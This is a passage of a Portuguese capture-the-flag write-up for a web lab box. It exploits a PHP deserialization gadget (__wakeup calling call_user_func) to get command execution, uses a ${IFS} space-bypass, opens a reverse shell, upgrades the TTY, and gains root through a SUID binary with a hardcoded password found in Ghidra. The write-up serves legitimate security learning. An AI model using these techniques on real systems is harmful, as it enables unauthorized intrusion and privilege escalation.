id="0ec577a6-163f-4d7f-83be-f7815e061d33" class="code"><code>Class UHCProtocol{
    public $data;
    public function __wakeup(){
    $this-&gt;add();
    }
    public function add(){
        return call_user_func($this-&gt;data, $_SERVER[&#x27;QUERY_STRING&#x27;]);
    }
}</code></pre><p id="8d648f0b-9b6e-41ea-a3c3-8f226ee4c389" class="">Observem a função wakeup, ela é uma função que recebe o nome de função mágica. Toda vez que no php um objeto é desserealizado essa função é chamada.</p><p id="67ec1c53-344a-46fe-ac60-b688dcdbe7f7" class="">Nessa classe a função wakeup está executando a função add() que por sua vez tem um call_user_func que recebe os valores $data e os valores contidos na query do request (http://website.com/index.php?this-is=a-query).</p><p id="ce73a725-3081-4c46-81b7-443bf93a5701" class="">O valor de $data vai ser o nome da função que o call_user_func vai executar e os calores da query serão os argumentos...</p><p id="121f43b0-bfa4-424f-bf70-7c4bf903302b" class="">Ok, temos o código vulnerável a desserealização, mas onde tem um objeto para ser desserealizado?</p><p id="fe00fe59-b5e5-4a4b-9847-97ba748bb632" class="">Simples! Se lembram do nosso &quot;poder&quot; de executar funções com o nosso body malicioso no request PUT? Vamos um &quot;unserealize&quot; com os argumentos sendo um objeto modificado por nós.</p><p id="17edbc40-aad1-4c29-805d-9e95a7bc72ab" class="">Esse objeto modificado terá que ter o nome da função que iremos rodar com o valor de $data, portanto vamos apenas escrever um script para serializar uma classe modificada.</p><pre id="c3592cb3-5b0a-49f5-a908-86745b240e13" class="code"><code>&lt;?php
Class UHCProtocol{
    public $data = &quot;print_r&quot;;
    public function __wakeup(){
    $this-&gt;add();
    }
    public function add(){
        return call_user_func($this-&gt;data, $_SERVER[&#x27;QUERY_STRING&#x27;]);
    }
}
$object = new UHCProtocol();
echo serialize($object);
?&gt;</code></pre><figure id="0390bd11-16c2-4621-86a3-c76f317c0e98" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2013.png"><img style="width:521px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2013.png"/></a></figure><p id="8229c589-c0a2-48ca-8388-2f9335c878fe" class="">Agora vamos desserealizar isso e passar os argumentos na query da URL:</p><figure id="0719825e-3d48-45a7-986b-dffaedfb36f9" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2014.png"><img style="width:1007px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2014.png"/></a></figure><p id="bd33194f-5790-4dcd-92e9-cf3fdd1fa720" class="">Conseguimos! Com isso não precisamos nos importar com as funções proibidas do config.php, já que nosso $data não passa por nenhum tipo de validação.</p><p id="4023cb23-0142-4c59-81eb-ad6bfb7f0665" class="">Porém vamos ver no info.php se tem alguma função que não tenha sido desabilitada que possa permitir um RCE.</p><figure id="13ca2b6b-c6e4-4247-a440-b80a1dad2546" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2015.png"><img style="width:850px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2015.png"/></a></figure><p id="e1df17f1-bfe7-46f4-a479-0d05bf4ab8ec" class="">Dando uma olhada, parece que a função &quot;exec&quot; está liberada, vamos testar, porém é importante lembrar que a função exec não possui output, logo vamos rodar um &quot;sleep&quot; para ver se o código foi executado.</p><figure id="0910ead8-5736-4f51-a075-1761c14902bd" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2016.png"><img style="width:1229px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2016.png"/></a></figure><p id="7d86ecb2-136e-4d37-8dfc-1b07f0e82cee" class="">Parece que deu certo, utilizei ${IFS} pois é um bypass para dar um espaço no linux. </p><p id="b1fdc443-3448-4598-bfa3-0270d476e5ff" class="">Temos RCE, agora vamos pegar uma reverse shell!</p><h1 id="88865740-cab7-4d1a-8228-d4874df6b132" class="">Pós-exploitation - Root</h1><figure id="4a6aa688-3215-45a4-8316-96db8df8bd01" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2017.png"><img style="width:1366px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2017.png"/></a></figure><p id="435ee1ed-a6e4-4c57-acce-87101482ecd6" class="">Habemos shell!</p><pre id="cad79f9d-b150-406b-b107-d2d3c1555640" class="code"><code>Full tty shell
in your shell~ python3 -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;
CTRL + Z
in your terminal~ stty raw -echo; fg
ENTER
in your shell~ export TERM=xterm</code></pre><p id="c21908a9-a33d-4017-b138-5b0063c28c52" class="">E dando uma olhada no &quot;/&quot;, habemos flag!</p><figure id="97a8017f-ae7d-487d-8a26-6f679d350f83" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2018.png"><img style="width:646px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2018.png"/></a></figure><p id="693bf062-bba6-4826-a600-d0c85126d151" class="">Fazendo um recon normal de pós exploitation, consegui achar algumas coisas interessantes, a mais especial, um script com permissão de SUID chamado &quot;storm&quot; no / :</p><figure id="e9c3b8e5-e355-401c-a54c-119840248734" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2019.png"><img style="width:538px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2019.png"/></a></figure><p id="0c8b3c8a-066c-4860-ae7e-c35e7d9fa49e" class="">Rodando ele parece que ele tem alguma palavra certa para se usar, como uma senha:</p><figure id="3a74c428-0514-4f07-a4ba-6e41ecb77ee3" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2020.png"><img style="width:419px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2020.png"/></a></figure><p id="18507a67-ad47-4acf-a4e5-8bf7be42811b" class="">Vamos usar o Ghidra para analizar o programa baixando para a nossa máquina e fazendo uma engenharia reversa para ver como ele está funcionando:</p><figure id="e2675304-9f12-4aa7-852c-fc7c69208ae2" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2021.png"><img style="width:781px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2021.png"/></a></figure><p id="036ad685-090a-4801-b979-b95472fd7d89" class="">Esse é o código decompilado pelo ghidra, o programa recebe um valor digitado pelo usuário pelo scanf e compara esse valor a uma string com o strcmp(), e então dependendo do que retornar dessa comparação ele vai executar um sleep e uma função chamada shell ou vai executar um print dizendo &quot;Invalid cloud name&quot;.</p><p id="22990492-e2a3-4479-ab21-088e18583a79" class="">O que tem na função shell?</p><figure id="aa64da28-f2dd-48bb-9426-163934572966" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2022.png"><img style="width:611px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2022.png"/></a></figure><p id="40cad210-ea88-4535-ad4a-54fd6f1a0863" class="">Lembram que o programa tinha o capability de SUID? Nessa função shell ele seta o UID para 0 (root) e chama uma shell, isso significa que se a nossa comparação retornar true (se digitarmos a palavra certa), o programa vai nos dar uma shell de root. </p><p id="3965c498-3753-4874-8ba7-8d691c872e8d" class="">Vamos dar uma olhada nessa comparação novamente.</p><pre id="c4dbf88b-7beb-477c-b873-46a741c5c83e" class="code"><code>iVar1 = strcmp(&quot;__libc_csu_fini&quot;,acStack200); </code></pre><p id="16251e4f-8cf5-46b6-a0d0-f27a4eac0b1b" class="">Perceberam? É uma string, o prgrama verifica se no input do usuário existe &quot;__libc_csu_fini&quot;, logo, temos a &quot;senha&quot;! Vamos usar.</p><figure id="fd28e0c4-ee68-490b-8a7c-69db1b606cfa" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2023.png"><img style="width:488px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2023.png"/></a></figure><p id="a8faf75d-8e7d-46c9-8f44-906667992149" class="">Depois de um tempo (por conta do sleep), o programa nos da uma shell de root!</p><p id="ce482d20-132c-4df0-a682-107f00d990de" class="">Na home do root encontrei a flag!</p><figure id="e1137deb-bc1d-48ac-9854-5e97225801fe" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2024.png"><img style="width:240px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2024.png"/></a></figure><p id="6eeec8a0-ea1f-4b6d-8fab-c7330a849052" class="">É isso, obrigado por ler até aqui, e parabéns kadu pela máquina!</p><p id="c379aec5-53ff-42e1-95f8-474800535e14" class="">
</p><p id="e5d3d60c-f9ed-434d-a97b-9a2ff60e7537" class="">
</p></div></article></body></html>